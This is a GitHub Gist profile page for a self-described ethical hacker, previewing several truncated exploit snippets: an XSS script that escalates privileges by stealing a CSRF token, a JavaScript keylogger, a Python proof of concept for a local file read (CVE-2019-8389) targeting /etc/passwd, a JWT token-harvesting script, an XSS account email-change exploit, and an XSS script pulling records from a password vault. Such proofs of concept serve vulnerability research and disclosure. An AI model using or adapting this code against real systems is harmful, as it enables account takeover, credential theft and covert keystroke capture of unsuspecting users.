Skip to content

Instantly share code, notes, and snippets.


Shawar Khan shawarkhanethicalhacker

View GitHub Profile
shawarkhanethicalhacker / XSS_Privilege_Escalation.js
Created Aug 4, 2019
Privilege escalation exploit code for XSS vulnerability that I have recently discovered.
View XSS_Privilege_Escalation.js
// XSS Exploit code for Privilege Escalation
// Author: Shawar Khan
var woot = document.createElement('html');
fetch('',{credentials: 'include'}).then((resp) => resp.text()).then(function(data){
var csrf_token = woot.getElementsByTagName('meta')[3]['content'];
View exptest.js
var keys = '';
document.onkeypress = function(e) {
var get = window.event ? event : e;
var key = get.keyCode ? get.keyCode : get.charCode;
key = String.fromCharCode(key);
keys += key;----
shawarkhanethicalhacker /
Last active Feb 17, 2019
[CVE-2019-8389] An exploit code for exploiting a local file read vulnerability in Musicloud v1.6 iOS Application
# Proof of concept for CVE-2019-8389
# Exploit author: Shawar Khan
import sys
import requests
def usage():
print "Usage:\n\tpython /etc/passwd\n"
shawarkhanethicalhacker /
Last active Jan 28, 2019
A little automation for obtaining JWT token for a POC
# A sample code that obtains a permanent JWT token when provided a temporary JWT token
import json
import requests
import sys
from requests.packages.urllib3.exceptions import InsecureRequestWarning
jwt_token=raw_input("Enter token > ")
exploit_url = ""
exploit_headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0", "Accept": "*/*", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Referer": "", "authorization": "Bearer "+str(jwt_token), "content-type": "application/json", "origin": "", "Connection": "clos"}
shawarkhanethicalhacker / email_change_exploit_xss.js
Created Sep 14, 2018
This is a sample exploit for exploiting an XSS vulnerability that changes the user email. This bypasses some CSRF protections as the page was revoking the CSRF protections when refreshed.
View email_change_exploit_xss.js
// a Simple XSS exploit for email change
// Shawar Khan
var dark_window ='');
function exploit_run(){
dark_window.document.body.getElementsByTagName('form')[0][2].value='' // changes email
dark_window.document.body.getElementsByTagName('form')[0][40].click() // clicks for submission
shawarkhanethicalhacker / password_vault_exploit.js
Created Aug 20, 2018
XSS Exploit code for retrieving passwords stored in a Password Vault
View password_vault_exploit.js
//Exploit Code by Shawar Khan
var data_chunks = '';
// Capturing Records from API
fetch('').then((resp) => resp.text()).then(function(data) {
// Holds the records in as String
var allrecords = data;
// converting response to JSON